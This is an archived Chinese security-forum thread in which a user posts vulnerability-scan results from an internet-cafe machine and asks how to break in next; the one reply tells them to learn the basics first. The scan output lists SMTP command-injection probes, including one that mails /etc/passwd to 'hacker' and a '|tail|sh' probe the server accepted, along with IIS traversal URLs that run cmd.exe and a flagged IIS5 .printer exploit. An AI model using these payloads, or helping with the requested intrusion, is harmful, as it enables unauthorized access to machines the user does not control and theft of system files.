这是在 20CN网络安全小组第一代论坛 的论坛 菜鸟乐园 中的主题 大虾进来啊!(难)


要查看这个主题,请使用这个 URL:
http://www.20cn.net/cgi-bin/ubb/ultimatebb.cgi?ubb=get_topic;f=1;t=001453
无余 (编号: 3284) 发表于 :
 
SMTP检测

支持VRFY
检测 SMTP->192.168.0.1 250 server1 Hello [192.168.0.62]
检测 SMTP->192.168.0.1 检测debug漏洞 500 5.3.3 Unrecognized command
检测 SMTP->192.168.0.1 检测kill漏洞 500 5.3.3 Unrecognized command
检测 SMTP->192.168.0.1 检测wiz漏洞 500 5.3.3 Unrecognized command
检测 SMTP->192.168.0.1 检测rcpt to: /tmp/.rhosts漏洞 503 5.5.2 Need Mail From: first
检测 SMTP->192.168.0.1 检测+ +漏洞 500 5.3.3 Unrecognized command
检测 SMTP->192.168.0.1 检测RSET漏洞 250 2.0.0 Resetting
检测 SMTP->192.168.0.1 检测mail from: |/bin/mail hacker < /etc/passwd漏洞 501 5.5.4 Invalid arguments
检测 SMTP->192.168.0.1 检测RSET漏洞 250 2.0.0 Resetting
检测 SMTP->192.168.0.1 检测mail from: |tail|sh漏洞 250 2.1.0 |tail|sh@server1....Sender OK

--------------------------------------------------------------------------------

弱口令检测

--------------------------------------------------------------------------------

端口检测

25 [smtp]
110 [pop3]
80 [http]
135 [epmap]
139 [netbios-ssn]
443 [https]

--------------------------------------------------------------------------------

CGI/ASP漏洞

192.168.0.1/*.idq
192.168.0.1/*.ida
192.168.0.1/?PageServices
192.168.0.1/_vti_bin/fpcount.exe?Page=default.htm|Image=2|Digits=1
192.168.0.1/_vti_inf.html
192.168.0.1/_vti_bin/shtml.exe
192.168.0.1/_vti_bin/shtml.dll
192.168.0.1/_vti_bin/shtml.dll/nosuch.htm
192.168.0.1/null.htw?CiWebHitsFile=/index.asp%20&CiRestriction=none&CiHiliteType=Full
192.168.0.1/?wp-cs-dump
192.168.0.1/?wp-stop-ver
192.168.0.1/?wp-html-rend
192.168.0.1/?wp-uncheckout
192.168.0.1/?wp-start-ver
192.168.0.1/?wp-usr-prop
192.168.0.1/?wp-ver-diff
192.168.0.1/?wp-verify-link
192.168.0.1/?wp-ver-info
192.168.0.1/_vti_bin/fpcount.exe
192.168.0.1/_vti_bin/shtml.dll/_vti_rpc
192.168.0.1/abczxv.htw
192.168.0.1/blabla.idq
192.168.0.1/scripts/samples/search/author.idq
192.168.0.1/scripts/samples/search/filesize.idq
192.168.0.1/scripts/samples/search/filetime.idq
192.168.0.1/scripts/samples/search/query.idq
192.168.0.1/scripts/samples/search/qsumrhit.htw
192.168.0.1/scripts/samples/search/qfullhit.htw
192.168.0.1/scripts/samples/search/simple.idq
192.168.0.1/scripts/samples/search/queryhit.idq
192.168.0.1/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir%20c:\
192.168.0.1/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
192.168.0.1/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir
192.168.0.1/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
192.168.0.1/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir
192.168.0.1/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir
192.168.0.1/scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
192.168.0.1/scripts/..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
192.168.0.1/scripts/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
192.168.0.1/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
192.168.0.1/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
192.168.0.1/null.htw
192.168.0.1/prxdocs/misc/prxrch.idq


IIS5.0 NULL.printer Exploit ...OK
这是我扫描网吧机子的结果!下面该怎么入侵啊?
 

酷公爵 (编号: 3186) 发表于 :
 
你从基础知识学起吧!
 




Powered by Infopop Corporation
UBB.classic™ 6.5.0
NetDemon修改版 1.5.0, 20CN网络安全小组 版权所有。